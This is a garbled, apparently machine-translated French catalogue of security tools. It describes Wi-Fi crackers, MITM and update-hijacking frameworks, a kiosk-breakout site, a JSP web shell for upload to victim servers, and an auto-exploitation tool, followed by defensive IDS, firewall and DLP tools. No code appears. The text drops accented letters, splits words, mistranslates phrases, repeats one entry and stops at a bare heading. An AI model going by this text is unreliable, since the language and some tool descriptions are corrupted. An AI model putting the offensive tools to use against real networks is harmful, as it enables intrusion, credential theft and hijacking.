X5 ne pas injecter des charges utiles XSS - il ne tente pas d'exploiter ou de co nfirmer une vulnrabilit XSS. Il est conu pour attirer votre attention sur les champ s et les paramtres qui semblent des candidats probables la vulnrabilit. Un testeur de scurit examinera les rsultats pour trouver des questions o les caractres spciaux on t t dangereusement transform ou mis sans un codage en toute scurit. Cela peut tre fait rapidement par les rsultats d'analyse, qui ont t conus avec l'intention de fournir u ne inspection visuelle rapide. Rsultats filtres sont galement inclus pour le teste ur peut simplement cliquer hotspots spectacle voir que les zones problme potentie l. Aprs avoir identifi un hotspot c'est le travail du testeur pour effectuer la va lidation et des tests supplmentaires XSS. Les types de cas de test qui X5 comprend: 1. des cas de test traditionnelles - les caractres gnralement utiliss pour tester l' injection XSS tels que <,>, ", et" qui sont utiliss pour le contrle HTML, CSS, jav ascript ou; 2. des cas de test transformable - caractres qui pourraient les majuscules, minus cules, Normaliser, la carte la mieux adapte, ou autrement transformer compltement caractres diffrents, par exemple turc je qui sera en minuscule pour i dans le logiciel conscient de la culture. 3. Trop long UTF-8 cas d'essai - non plus court-codages UTF-8 de la "traditionne lle" des cas de test mentionn ci-dessus. Par exemple, le <ASCII est 0x3C normalem ent et 0xC0 0xBC dans le plus court de forme non UTF-8. Sans fil Airtun-ng

http://www.aircrack-ng.org/doku.php?id=main Aircrack-ng est un WEP 802.11 et les cls WPA-PSK programme de craquage qui peut rc uprer les cls une fois assez de paquets de donnes ont t capturs. Il met en uvre le sta dard FMS attaque avec quelques optimisations telles que des attaques KoreK, ains i que l'attaque tous les nouveaux-PTW, ce qui rend l'attaque beaucoup plus rapid e par rapport aux autres outils de craquage WEP. En fait, Aircrack-ng est un ens emble d'outils pour les rseaux sans fil d'audit. FireShepherd http://notendur.hi.is/ ~ gas15/FireShepherd / FireShepherd, un petit programme console qui inonde le rseau sans fil proximit ave c des paquets conu pour teindre FireSheep, effectivement fermer proximit programmes FireSheep toutes les 0,5 secondes, ou alors, vous faire et les gens autour de v ous l'abri de la plupart des gens utilisant FireSheep. Le programme tue la version actuelle de FireSheep qui coulait tout prs, mais l'ut ilisateur est toujours en danger de toutes les sessions d'autres mcanismes de dtou rnement. Ne pas faire n'importe quoi sur un rseau non scuris que vous ne pouvez pas partager avec tout le monde.

-Sachez que ce n'est qu'une solution temporaire au problme FireSheep, cr pour donne r aux gens la chance de se scuriser et les autres autour d'eux de la menace actue lle, alors que les failles de scurit rvles par FireSheep sont fixes. Facultatif commutateurs de ligne de commande: -I * IP * IP de destination pour les paquets, routeur local est recommand. (Un se rveur facebook trivial est par dfaut) Le routeur local peut tre consulte par la commande tracert. (Par exemple le premie r coup de tracert www.google.com") -T timeout * * timeout en ms pour l'envoi de paquets. Environ 200 est ok pour un routeur local. (400 par dfaut) -H Affiche ce message Keykeriki http://www.remote-exploit.org/?page_id=187 universelle renifleur de clavier sans fil: Keykeriki. Ce projet opensource de ma triel et de logiciels permet chaque personne afin de vrifier le niveau de scurit de leurs transmissions propre clavier et / ou dmontrer les attaques sniffing ( des fi ns ducatives seulement). Le matriel lui-mme est conu pour tre petit et polyvalent, il peut tre tendu l'heure actuelle dtects / trafic clavier inconnu, et / ou matriel ext ensions, par exemple, un module de rpter ou de l'amplificateur KisMAC http://trac.kismac-ng.org/ KisMAC wiki! KisMAC est un open-source et gratuit sniffer / scanner d'applicatio ns pour Mac OS X. Il a un avantage sur MacStumbler / iStumbler / NetStumbler en ce qu'il utilise le mode de surveillance et de balayage passif. KisMAC supporte plusieurs tiers cartes PCMCIA: Ornoque, PrismII, Cisco Aironet, A theros et PrismGT. priphriques USB avec Intersil Prism2, Ralink rt2570 et rt73, et Realtek RTL8187 chipsets sont en cours vers un soutien complet ainsi. Tout le m atriel AirPort interne est prise en charge pour la numrisation. Wi-Feye http://wi-feye.za1d.com/index.html Wi-Feye peut tre considr comme une interface graphique pour presque tous les outils que nous utilisons tous les jours. Il est conu pour tre l'outil ultime point-andshoot. Wi-Feye vous permettra d'effectuer un certain nombre de puissantes attaqu es automatiquement. Tout ce que vous avez faire est de lancer une connexion Wi-F eye, choisissez qui attaquent excuter, slectionnez votre cible et laissez Wi-Feye faire de la magie! Donc, vous voyez qu'il est conu pour aider tester la pntration d u rseau, de reconnaissance, etc Wi-Feye est divis en quatre menus principaux: 1. Cracking menu: Ce menu vous permettra de: Activer le mode de surveillance Afficher les rseaux sans fil. Lancement airodump-ng sur un thme particulier AP Craquage WEP: Cela vous permettra d'effectuer automatiquement les attaques suiva ntes: * Rediffusion paquet Interactive. * Attaque d'authentification Fake. * Attaque chopchop Korek. * Une attaque par fragmentation. * Hirte Attack (attaque cfrag). * Wesside-ng.

WPA Cracking: Celui-ci contient les attaques suivantes: Attaque Wordlist * * Attaque AP Rouge 2. Cartographie: Ce menu vous permettra de faire ce qui suit: Scan le rseau et afficher les htes connects Utiliser Nmap automatiquement 3. MITM: Ce menu vous permettra de faire ce qui suit automatiquement: Activer le routage IP ARP Spoof Lancement ettercap (mode texte). Sniff SSL / HTTPS trafic. URL de Sniff et de les envoyer au navigateur. Sniff messagers de messageries instantanes. Sniff images. DNS frauduleux. Session Hijacking HTTP (en utilisant Hamster). 4. Autres: Ce menu vous permettra de faire ce qui suit automatiquement: Changement d'adresse MAC. mises jour logicielles Hijack ( l'aide Evilgrade). A l'heure actuelle, vous devez avoir dj vu pourquoi nous avons dit qu'il est une i nterface graphique pour diffrents outils. Il peut tre considr comme un simple wrappe r Python pour diffrents outils. Le fichier Wi-fEye.py vous aidera intgrer la liste suivante des outils ncessaires pour chaque module: * Aircrack-ng est ncessaire pour toutes les attaques dans le menu de craquage * Nmap est utilis dans le menu de Nmap. * Ettercap est trs important car il est utilis dans les attaques suivantes: 1. 2. 3. 4. 5. ARP Spoofing. SSL / HTTPS reniflement. URL sniffing. DNS Spoofing. Image sniffing.

* Msgsnarf d'intercepter les messages de la messagerie instantane. * Hamster pour le dtournement de session HTTP * Attendez-vous et Evilgrade pour dtournement de logiciels. Par exemple, si vous voulez dtourner mises jour logicielles dans le rseau, tout ce que vous avez faire est de slectionner le logiciel que vous souhaitez pour dtourn er sa mise jour, slectionnez une charge utile, slectionnez la cible et c'est tout! Wif-Eye va utiliser Metasploit de crer et de chiffrer l'agent, dbut multi / gesti onnaire, arrter le Apache si elle est dj en cours d'excution, dmarrez le serveur DNS frauduleux evilgrade et les mises jour evilgrade! C'est aussi simple que cela! WiPhire http://sourceforge.net/projects/wiphire/ WiPhire est un script Bash visant rendre le processus Wireless Hacking beaucoup plus facile. Ce script a t crit sur Backtrack 4 et conu pour tre utilis avec Backtrack 4. Ce script a t galement conu pour tre utilis avec l'adaptateur sans fil Alfa AWUS03 6H avec le chipset RTL8187. Si vous n'avez pas ce chipset, mais une autre carte qui est compatible avec la suite aircrack-ng vous aurez besoin de le mettre en m ode moniteur avant d'excuter le script si vous souhaitez utiliser une option qui doit suivre le mode activ. Ce script doit tre excut en tant que root. Ce sont les fonctions du script:

* * * * * *

Spoofer autoMACtic MAC Capacit de crack rseaux WEP Capacit de crack WPA des rseaux Effectuer simple attaques MITM Dnsspoof un rseau Utilisez largage-ng pour crer un brouilleur

Programmes qui utilise WiPhire: * * * * * * * * * * * * * * * Airmon-ng Airodump-ng Aireplay-ng Aircrack-ng Largage-ng Xterm Crunch Pyrit Sslstrip Arpspoof Macchanger Kate Apache2 Ettercap Firefox

grimwepa http://code.google.com/p/grimwepa/ Considrez Grimwepa un front-end de nombreux auditeurs clbre Wired Equivalent Privac y (WEP) et Wi-Fi Protected Access mot de passe (WPA). Nous n'avons pas t en mesure d'utiliser celle-ci comme nous l'avons t trs occups avec les diffrentes missions.Mai s, encore ce mrite une mention.

Grimwepa est un cracker de mot de passe pour les deux WEP et WPA-points d'accs cr ypt (routeurs). Il est crit en Java et est destin tre utilis avec le systme d'exploit tion Linux, plus prcisment pour la distribution de BackTrack. Il n'a que deux mode s: points d'accs Crack WEP crypt (routeurs) et le crack des points d'accs WPA-crypt. Il peut rechercher de nouvelles cibles, et slectionne automatiquement votre mthod e de fissuration! A peu prs tout est fait pour vous. inSSIDer http://www.metageek.net/products/inssider geeks authentique, qu'ils soient professionnels ou occasionnels, ont besoin d'ou tils Wi-Fi qui permettent rseaux WLAN dpanner. Avec inSSIDer, MetaGeek a cr un cadea u qui continue donner. Notre technologie prime, open-source Wi-Fi logiciel du sca nner, inSSIDer, est une alternative aux scanners rseau comme NetStumbler. Une gra nde diffrence: inSSIDer travaille en fait avec Windows Vista, Windows 7, et 64-bi t PC. inSSIDer est gratuit, open-source Wi-Fi logiciel de numrisation. Et pourtant, vou s voulez en savoir plus. Wow. vous tes vraiment notre type de geek. Jetez un oeil des caractristiques ci-dessous pour voir ce qui fait inSSIDer spciale. Ce qui est unique inSSIDer? * * * * Compatible avec Windows XP, Vista et 7 (32 et 64-bit) Utilise le Native Wi-Fi API et votre carte actuelle du rseau sans fil Trier les rsultats par adresse MAC, SSID, canal, RSSI et Last Time Vu" Compatible avec la plupart des appareils GPS (NMEA v2.3 et suprieur)

Comment peut-inSSIDer m'aider? * Inspectez votre WLAN et les rseaux environnants pour rsoudre les points d'accs co ncurrents * Suivre la force du signal reu en dBm au fil du temps * Points d'accs dans un filtre facile utiliser le format * Mise en vidence des points d'accs pour les zones concentration Wi-Fi haut * Exportation Wi-Fi et des donnes GPS dans un fichier KML pour visualiser dans Go ogle Earth. * Filtrer travers des centaines de points d'accs numris ubitack http://code.google.com/p/ubitack/ Cet outil automatise quelques-unes des tches que vous pourriez avoir besoin sur u n test de pntration (sans fil) ou pendant que vous tes en dplacement. Il vise tre un outil polyvalent pour: * Se connecter des points d'accs diffrents avec des comptences diffrentes facile uti liser avec des fichiers de configuration * Excuter un mal / point d'accs non autoriss (Karma, Karmetasploit) * Pouvoirs Sniff (dsniff suite, sslstrip) * Pouvoirs Hamster (Wifizoo, Ferret, Hamster) * Test de cryptage WEP (Wepbuster) * Mettre en place des connexions scurise dans des environnements hostiles (le tunn el SSH, OpenVPN, DNS Tunnel) * Installation et mise jour des logiciels requis Rdig pour la disto de scurit Backtrack, largement test sur BT4 final en particulier, g alement en cours d'excution sur Ubuntu 9.10, mais pourrait fonctionner sur les sy stmes d'autres, aussi. binpack http://westcoasthackers.net/projects/binpack/ BinPack est un environnement de scurit portable pour Windows.Grce des outils de scur it 100 + dans le rfrentiel, vous pouvez facilement convertir n'importe quel systme d ans une plate-forme de piratage en quelques minutes. honggfuzz http://code.google.com/p/honggfuzz/ Honggfuzz est un outil de fuzzing des fins gnrales. tant donn un corpus partir de fi chiers de test, de fournitures et modifie Hongfuzz entre un programme de test et d'utiliser les ptrace () API / interface signal POSIX de dtecter et d'enregistrer les accidents. Fondamentalement, il s'agit d'un simple, facile utiliser via l'interface de lign e de commande, en fournissant des analyses des accidents de la belle logiciel so us une forme simple de noms de fichiers. Il a t utilis pour trouver un peu (peut-tre exploitable) bugs dans certains logiciel s majeurs, y compris freetype2, librsvg et libtiff. Caractristiques * Installation facile: Aucun fichier de configuration ou d'installation complique ncessaires - Hongfuzz peut tre excut directement partir de la ligne de commande. * Rapide: multiples instances Hongfuzz peuvent tre excutes simultanment pour fuzzing plus efficace.

* Puissantes capacits d'analyse: Hongfuzz utilisera l'analyse des processus les p lus puissants de l'tat (ptrace par exemple) sous une interface donne OS. IKAT

http://ikat.ha.cked.net/Windows/index.html IKAT a t conu pour aider les consultants en scurit avec la tche de vrification de la s rit d'un terminal Windows Kiosque sur Internet. ikat est conu pour fournir un accs au systme d'exploitation sous-jacent d'un terminal de kiosque en invoquant natif OS fonctionnalit. Cet outil devrait tre (et est) utilis par les vendeurs Kiosque / dveloppeurs / fournisseurs pour tester la scurit de leurs produits propre kiosque. Conu comme un SaaS, IKAT caractristiques de nombreuses mthodes de s'chapper d'un env ironnement de navigateur emprisonn et obtenir l'excution de commandes. ikat est un site Web que vous visitez partir d'un kiosque, son rapide, gratuit et vise s'il vous plat. ikat est uniquement dvelopp par moi-mme (Paul Craig) un passionn de Kiosq ue le piratage de la Nouvelle-Zlande. Quoi de neuf dans IKAT v3 Sign Code Tous les outils ikat, VBScripts, ActiveXs, ClickOnce, les applications Silverlig ht sont dsormais sign par une autorit digne de confiance! Il ya quatre mois j'ai pl ac un "Donate Now" sur la page d'accueil de l'ikat, dans l'espoir d'amasser des f onds pour un certificat de signature de code Malheureusement seulement deux pers onnes ont donn de trsorerie (Enrique Martinez Exposito et Gerald Fehringer, vous l es gars rock) Heureusement, un vendeur de kiosque a t prts venir la fte et de donner l'argent restant. Un grand merci Kioware kiosques, qui ont aimablement fait don du reste de l'argent. Tous les outils sont maintenant IKAT sign par une AC de co nfiance. Autres outils IKAT contient maintenant plus d'outils emballs dans des contenants diffrents, des formats de fichier, au format PDF, et mme les installateurs silencieux. Applets J ava Plus, Plus VBScript, WMI Plus! IKAT ActiveX Un nouveau ActiveX qui se concentre sur Windows Shell piratage et processus de r eproduction. L'ActiveX est sign et fournit une quantit folle de fonctionnalit. IKAT OfficeKAT Merci Didier Stevens qui avait donn son "Excel Spawn CMD en mmoire" astuce pour le projet IKAT OfficeKAT vous permet de pop shell dans des environnements o vous po uvez excuter Excel, qui plus est vous n'avez pas besoin d'crire sur le systme de fi chiers. IKAT SilverLight SilverLight (et mono) sont dsormais pris en charge par ikat, et de fournir encore un autre vecteur d'attaque pour votre plaisir Amlioration de recensement gestionnaire d'URI + Dossier Largement code d'numration amliore, plus URI, plus instantane "Une magie cliquez sur" . J'ai galement ajout le support certaines des plus intressantes en fonction des vu lnrabilits Microsoft gestionnaire d'URI sorti cette anne. Kiosking Emo - Crashing le Kiosque Le moyen le plus rapide de sortir de prison un environnement de navigateur est s imple, il CRASH. Curieusement c'est aussi la meilleure chose faire un navigateur , et Emo-Kiosking est devenu un truc favori personnel de la mine. IKAT prend dsor mais en charge plus de 60 mthodes diffrentes de s'craser un navigateur ou un naviga

teur add-on Cela vous permet de rapidement retomber sur le bureau, souvent avec un seul clic requis. Pour utiliser ikat il suffit de visiter l'URL suivante dans un navigateur systme de kiosque: http://ikat.ha.cked.net prn-2-moi http://blog.c22.cc/2010/11/23/printer-mitm-revisited-prn-2-me/ PRN-2-moi, c'est un simple auditeur qui peut tre configur pour fonctionner sur n'i mporte quel port (par dfaut est 9100 pour les connexions style jetdirect). L'outi l sera ensuite enregistrer tous les appels entrants PCL et les travaux d'impress ion PostScript de dposer et de les transmettre l'imprimante relle. pwnshell http://i8jesus.com/?p=191 Que faites-vous lorsque vous avez un fichier arbitraire tlcharger vers un rpertoire accessible sur le Web en J2EE? De toute vidence, vous avez besoin d'une coquille JSP! Mais il ya un problme: celles qui sont disponibles sont des sortes de terri ble. Le Metasploit shell inverse est seulement destin servir d'espace rserv pour un e bote de dj-proprit. Le monde a besoin d'un shell JSP qui aide vraiment un pivot att aquant blackbox d'importants atouts, alors j'ai pris un coup de poignard elle. C 'est ce qu'on appelle assez maladroitement appel pwnshell. Qu'est-ce que c'est? Un seul fichier JSP, incorpor avec jQuery et tout le reste vous avez besoin de fa ire une coquille web gnial. Comment l'utilisez-vous? 1. le tlcharger sur le serveur de la victime (l'essayer sur un serveur Tomcat loca le!) 2. Parcourir pour le 3. Imaginez que vous tes en regardant xterm D'o vient-il? - Fonctionne sur plate-forme - Fonctionne sur Java 1.5 + (sans doute 1,4 trop, mais je n'ai pas test) Pourquoi voudriez-vous l'utiliser? - Naviguez travers le systme (comme l'utilisateur du systme d'applications Web) - Excuter des commandes arbitraires du systme (c'est un shell, aprs tout) - Afficher et modifier les variables de session - Dump entres JNDI winautopwn http://winautopwn.co.nr/ Autohack vos cibles avec une interaction moins possible. Caractristiques: - Contient dj compils par les excutables d'exploits clbres et efficaces alongwith quel ques exploits d'origine. - Pas besoin de dboguer un script ou de compiler le code source. - Scanne tous les ports 1 65535 aprs avoir pris l'adresse IP et tente tous les ex ploits possibles en fonction de la liste des ports ouverts dcouvert (OpenPorts.TX T)

PortScan est multi-thread. Ne ncessite pas de base de donnes l'arrire-end comme les autres Peut tre galement tre utilis pour tester l'efficacit des IDS / IPS Lanc exploits sont indpendants et ne reposent pas sur les empreintes digitales d service (pour viter l'vasion, le cas chant)

L'objectif de la cration winAUTOPWN n'est pas de rivaliser avec les cadres dj exist ants commerciaux comme Core Impact (Pro), immunit toile, Metasploit Framework (fr eeware), etc autohacks offre, mais de crer un gratuit, rapide, application autono me qui est facile utilisation et ne ncessite pas beaucoup de soutien des autres dpe ndances. A ne pas oublier que contrairement winAUTOPWN autres cadres maintient code sourc e de l'crivain d'origine exploiter intact tel qu'il tait et qu'il utilise. De cett e faon, l'exploit de crdit crivain et l'originalit est maintenue. La source est modi fie uniquement lorsque ncessaire pour permettre une fonctionnalit manquante ou limin er les limitations cod en dur. Dans ces conditions galement, l'exploit crdits crivai n restent intacts. Les nouveaux modules d'exploit sont ajouts au fur et librer et les plus gs sont galem ent ajouts tous les jours. Les binaires de perl, php, python et les DLL Cygwin (inclus) sont requis pour ex ister soit dans un dossier commun ou devrait tre install correctement avec leurs c hemins enregistrs pour ces exploits qui sont ne peuvent pas tre compils dans un PEexe. Certains anti-virus peut dtecter tort les exploits comme malveillants. winautopwn http://winautopwn.co.nr/ Autohack vos cibles avec une interaction moins possible. Caractristiques: - Contient dj compils par les excutables d'exploits clbres et efficaces alongwith quel ques exploits d'origine. - Pas besoin de dboguer un script ou de compiler le code source. - Scanne tous les ports 1 65535 aprs avoir pris l'adresse IP et tente tous les ex ploits possibles en fonction de la liste des ports ouverts dcouvert (OpenPorts.TX T) - PortScan est multi-thread. - Ne ncessite pas de base de donnes l'arrire-end comme les autres - Peut tre galement tre utilis pour tester l'efficacit des IDS / IPS - Lanc exploits sont indpendants et ne reposent pas sur les empreintes digitales d e service (pour viter l'vasion, le cas chant) L'objectif de la cration winAUTOPWN n'est pas de rivaliser avec les cadres dj exist ants commerciaux comme Core Impact (Pro), immunit toile, Metasploit Framework (fr eeware), etc autohacks offre, mais de crer un gratuit, rapide, application autono me qui est facile utilisation et ne ncessite pas beaucoup de soutien des autres dpe ndances. A ne pas oublier que contrairement winAUTOPWN autres cadres maintient code sourc e de l'crivain d'origine exploiter intact tel qu'il tait et qu'il utilise. De cett e faon, l'exploit de crdit crivain et l'originalit est maintenue. La source est modi fie uniquement lorsque ncessaire pour permettre une fonctionnalit manquante ou limin er les limitations cod en dur. Dans ces conditions galement, l'exploit crdits crivai n restent intacts. Les nouveaux modules d'exploit sont ajouts au fur et librer et les plus gs sont galem ent ajouts tous les jours.

Les binaires de perl, php, python et les DLL Cygwin (inclus) sont requis pour ex ister soit dans un dossier commun ou devrait tre install correctement avec leurs c hemins enregistrs pour ces exploits qui sont ne peuvent pas tre compils dans un PEexe. Certains anti-virus peut dtecter tort les exploits comme malveillants. Cheat Sheets Common Ports http://packetstormsecurity.org/papers/cheatsheets/common-ports.pdf Hping http://sbdtools.googlecode.com/files/hping3_cheatsheet_v1.0-ENG.pdf NMAP http://sbdtools.googlecode.com/files/Nmap5 triche eng v1.pdf Guide du test de l'OWASP http://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf Filtres d'affichage Wireshark http://packetstormsecurity.org/papers/cheatsheets/Wireshark_Display_Filters.pdf Dfensive Anti Meterpreter http://www.mertsarica.com/codes/antimeter.zip Antimeter est un outil trs utile pour les administrateurs de la scurit intrieure qui permet de numriser leurs systmes de session Meterpreter reste aprs qu'ils ont russi exploiter un systme de Metasploit. Arpon http://arpon.sourceforge.net/index.html Arpon (Arp inspection gestionnaire) est un dmon gestionnaire portables qui font A rp scuris afin d'viter ARP Spoofing / Empoisonnement & co. Cela est possible en utilisant deux types de tecniques anti ARP poisoning, le pr emier est bas sur SARPI ou ARP statique d'inspection", le second sur DARPI ou dynam ique Arp inspection" approche. Gardez l'esprit d'autres outils communs lutte contre l'empoisonnement ARP limite nt gnralement leur activit uniquement pour souligner le problme au lieu de la bloque r, il ne Arpon utilisant politiques SARPI et DARPI. Enfin, vous pouvez utiliser Arpon pentest certains commut / LAN hubbed avec / sans protocole DHCP, en fait, v ous pouvez dsactiver le dmon afin de pouvoir utiliser les outils pour empoisonner le cache ARP. Rappelez-vous qu'il n'affecte pas l'efficacit de la communication du protocole AR P! - Il remplace Arpwatch & co; blocs Arpon; - Il dtecte et bloque Arp Empoisonnement / Spoofing des attaques dans les rseaux c onfigurs de manire statique; - Il dtecte et bloque Arp Empoisonnement / Spoofing attentats dynamiquement confi gur (DHCP) des rseaux; - Il dtecte et bloque les attaques unidirectionnelles et bidirectionnelles; - Il gre l'interface rseau dans le dbrancher, de dmarrage, d'hibernation et de suspe

nsion caractristiques OS; - Facilement configurable via des commutateurs de ligne de commande, condition q ue vous avez les permissions root; - Il travaille en espace utilisateur pour des raisons de portabilit OS; - Test contre Ettercap, Cain & Abel, dsniff et d'autres outils. Pare-feu Gateway Astaro Security http://www.astaro.com/landingpages/en-worldwide-essential-firewall L'dition essentielles Firewall fournit une protection pour les adresses IP illimi te et les fonctions suivantes, sans limitations de temps: - Mise en rseau: routeur Internet, Par-del, le serveur DNS et proxy, DynDNS, serve ur DHCP et relais, le soutien NTP, QoS automatique - Rseau de la scurit: pare-feu Stateful Packet Inspection & Network Address Transla tion (DNAT / SNAT / Masquerade) - Accs distance: PPTP et L2TP sur IPSec de soutien (y compris le soutien iPhone) - Journaux / Rapports: la pleine exploitation forestire sur le disque dur local, la recherche, des rapports en temps rel pour le matriel, l'utilisation du rseau et la scurit des rseaux, des rapports quotidiens de direction - Gestion: Interface utilisateur graphique Web dans les langues locales, l'assis tant d'installation, de configuration de sauvegarde et de restauration, les noti fications d'administrateur, le support SNMP, gestion centralise via Astaro Comman d Center (galement gratuit) Quelles plateformes sont supportes par le Firewall Edition essentielles? Le logiciel pare-feu essentielles est disponible sous forme de logiciels et appl iance virtuelle. Les deux versions offrent l'ensemble des fonctionnalits identiqu es et comprennent un systme linux durci exploitation. * L'appareil logiciel peut tre install soit sur un PC ddi Intel compatible ou dans u ne machine virtuelle. * L'appliance virtuelle peut tre excut directement en tout VMware vSphere Edition Excution d'un Astaro Security Gateway sur une machine virtuelle protge votre envir onnement deux reprises: * La communication externe - La dfense contre les menaces provenant d'Internet, p ar exemple Chevaux de Troie et les virus * La communication inter-VM - contrle et surveille les donnes de trafic entre les machines virtuelles GreenSQL http://www.greensql.net/download GreenSQL est un pare-feu Open Source base de donnes utilise pour protger les bases de donnes contre les attaques par injection SQL. GreenSQL fonctionne comme un pro xy pour les commandes SQL et dispose du support pour MySQL. IDS / IPS Ossec http://www.ossec.net/main/ OSSEC est une solution volutive, multi-plateforme, open source bas sur l'hte Intrus ion Detection System (HIDS). Il a une forte corrlation et moteur d'analyse, l'intg ration de l'analyse des journaux, vrification de l'intgrit du fichier, de surveilla nce du registre Windows, l'application de la politique centralise, dtection des ro

otkits, alertes en temps rel et la rponse active. Patriot NG http://www.security-projects.com/?Patriot_NG Patriot est un outil de "Host IDS" qui permet de surveiller en temps rel des modi fications des systmes Windows ou des attaques rseau. Patriot moniteurs: * Variations de cls de registre: Indiquant si une touche sensible (autorun, paramt res d'Internet Explorer ...) est altre. * Nouveaux fichiers dans les rpertoires "Dmarrage" * Nouveaux utilisateurs dans le systme * Services Nouveau-install * Les changements dans le fichier hosts * De nouveaux emplois prvus Modification * de l'intgrit d'Internet Explorer: (New BHO, les changements de conf iguration, nouvelles barres d'outils) * Les variations dans le tableau ARP (prvention d'attaques MITM) * L'installation de nouveaux pilotes * Les actions New Netbios * TCP / IP de la Dfense (Nouveaux ports ouverts, de nouvelles connexions faites p ar des procds, la dtection PortScan ...) * Les fichiers dans les rpertoires critiques (les nouveaux executables, nouvelles DLL ...) * Les nouvelles fentres caches (cmd.exe / Internet Explorer en utilisant des objet s OLE) * Netbios connexions au systme * ARP Watch (New htes dans votre rseau) * NIDS (trafic anormal Dtecter rseau fond sur des rgles modifiables) Suricata http://www.openinfosecfoundation.org/index.php/downloads Le moteur est un Suricata Open Source Next Generation de dtection d'intrusion et de prvention du moteur. Ce moteur n'est pas destin remplacer imiter ou les outils existants dans l'industrie, mais ils apporteront de nouvelles ides et technologie s sur le terrain. OISF fait partie et financ par le ministre de la Direction de la Scurit intrieure pou r la science et de la technologie Programme d'accueil (Homeland Open Security Te chnology), en l'espace de la Marine et des Systmes Navals de Warfare Command (SPA WAR), ainsi que grce au soutien gnreux de l' membres du Consortium OISF. Plus d'inf ormations sur le Consortium est disponible, ainsi que la liste de nos membres ac tuels du consortium. Le moteur de Suricata et la Bibliothque HTP sont disponibles utiliser en vertu de la GPLv2. La Bibliothque HTP est un normalisateur HTTP et analyseur crit par Ivan Ristic du Mod de scurit pour la gloire OISF. Cette intgre et assure un traitement trs avanc de flux HTTP pour Suricata. La bibliothque HTP est requise par le moteur, mais peut g alement tre utilis indpendamment dans une large gamme d'applications et d'outils. samhain http://la-samhna.de/samhain/ Le systme anti-intrusion Samhain bas sur l'hte de dtection (HIDS) fournit une vrifica tion d'intgrit des fichiers et le suivi fichier journal / analyse, ainsi que la dte

ction de rootkit, la surveillance des ports, la dtection des excutables SUID voyou s, et les processus cachs. Samhain t conu pour surveiller des htes multiples systmes d'exploitation potentiellem ent diffrent, offrant la journalisation centralise et la maintenance, mais il peut aussi tre utilis comme application autonome sur un seul hte. A propos de Beltane Beltane est un systme de gestion bas sur le Web la console centrale de l'intgrit du fichier Samhain / systme de dtection d'intrusion. Il permet l'administrateur de pa rcourir les messages des clients, les reconnatre, et mettre jour les bases de don nes stockes de manire centralise de fichiers de signatures. Comme le dmon Samhain garde un souvenir des modifications apportes aux fichiers, l a base de signatures de fichiers ne doivent tre jour lors du redmarrage du dmon et des tlchargements partir de la base de donnes du serveur central. Beltane vous perm et d'utiliser les informations enregistres par le client pour mettre jour la base de signatures. snorby http://www.snorby.org Snorby est un nouveau et moderne Snort IDS avant la fin. Les concepts de base fo ndamentale derrire snorby sont la simplicit et la puissance. L'objectif du projet est de crer un libre, open source et l'application hautement concurrentiel de la surveillance du rseau la fois pour un usage priv et des entreprises. CNA PacketFence http://www.packetfence.org/en/home.html PacketFence est un contrle de code source libre et ouverte d'accs au rseau (NAC). P acketFence est activement maintenu et a t dploy dans de nombreuses institutions de g rande envergure au cours des dernires annes. Il peut tre utilis pour scuriser efficac ement les rseaux - de la petite trs grands rseaux htrognes. opendlp http://code.google.com/p/opendlp/ OpenDLP est une source libre et ouverte, base d'agents, grs de manire centralise, ma ssivement outil distribuable de prvention des pertes de donnes sous licence GPL. C ompte tenu des justificatifs de domaine Windows, OpenDLP peut identifier simulta nment les donnes sensibles au repos sur des centaines ou des milliers de systmes Mi crosoft Windows partir d'une application Web centralise. OpenDLP a deux composant es: une application web et d'un agent. Application Web * Dployer automatiquement et commencer agents sur NetBIOS * Lorsque vous avez termin, arrter automatiquement, dsinstaller et supprimer des ag ents sur NetBIOS * Suspendre, reprendre, avec force et dsinstaller les agents dans un ensemble de numriser ou sur des systmes individuels * Paralllement et en toute scurit recevoir les rsultats de centaines ou de milliers d'agents dploys sur deux voies de confiance connexion SSL * Crer compatibles Perl des expressions rgulires (PCREs) pour trouver des donnes sen sibles au repos * Crer des profils rutilisables pour les analyses qui incluent les rpertoires liste

blanche ou liste noire et les extensions de fichier * Examiner les conclusions et d'identifier les faux positifs * Rsultats l'exportation au format XML * crit en Perl avec MySQL backend Agent * Fonctionne sur Windows 2000 et versions ultrieures * Ecrit en C, sans autre condition. NET Framework * Fonctionne comme un service Windows faible priorit afin que les utilisateurs ne voient pas ou se sentent * Reprend automatiquement au redmarrage du systme sans interaction de l'utilisateu r * Transmettre en toute scurit des rsultats de l'application web des intervalles dfin is par l'utilisateur sur deux voies de confiance connexion SSL * PCREs utilise pour identifier les donnes sensibles contenues dans les fichiers * Effectuer des vrifications supplmentaires sur le potentiel de numros de carte de crdit pour rduire les faux positifs scannedonly http://olivier.sessink.nl/scannedonly/ Scannedonly est un module Samba VFS et un dmon balayage qui garantissent que seul s les fichiers qui ont t scanns pour les virus sont visibles et accessibles l'utili sateur final. Scannedonly se dcline en deux parties: un module samba vfs (inclus dans samba sam ba-3.5.0 depuis) et (un ou plusieurs) des dmons. Le dmon analyse les fichiers. . Si un fichier est propre, un second fichier est cr avec le prfixe numrises:. Le module s amba regarde simplement si une telle numrises:. Fichier existe et est plus rcent qu e le fichier pertinents. Si tel est le cas, le fichier est affich l'utilisateur. Si ce n'est pas le cas, le fichier n'est pas retourn dans toute inscription dans l'annuaire, et ne peut pas tre ouvert. Le module samba vfs galement dire au dmon de scan de ce fichier. Donc ce qui se passe pour l'utilisateur. La premire fois qu'un dossier est list, i l est vide, mais aprs une premire actualisation de tous les fichiers sont affichs. Il ya une scannedonly_prescan utilitaire qui peut vous aider tous les rpertoires de prvisualisation. Si un virus est dtect par le dmon, un fichier avec un message d'avertissement est c r dans le rpertoire de l'utilisateur, un avertissement est envoy aux journaux, et le fichier est renomm pour avoir prfixe virus.:. Les fichiers avec le virus:. Prfixe ne sont jamais montres l'utilisateur et tous l'accs est refus. Management Contenu Dradis cadre http://dradisframework.org/ Dradis est un framework open source pour permettre le partage efficace des infor mations. Dradis est une application Web autonome qui offre un rfrentiel centralis d 'informations pour garder une trace de ce qui a t fait jusqu' prsent, et ce qui est encore venir. Rseau Spiceworks

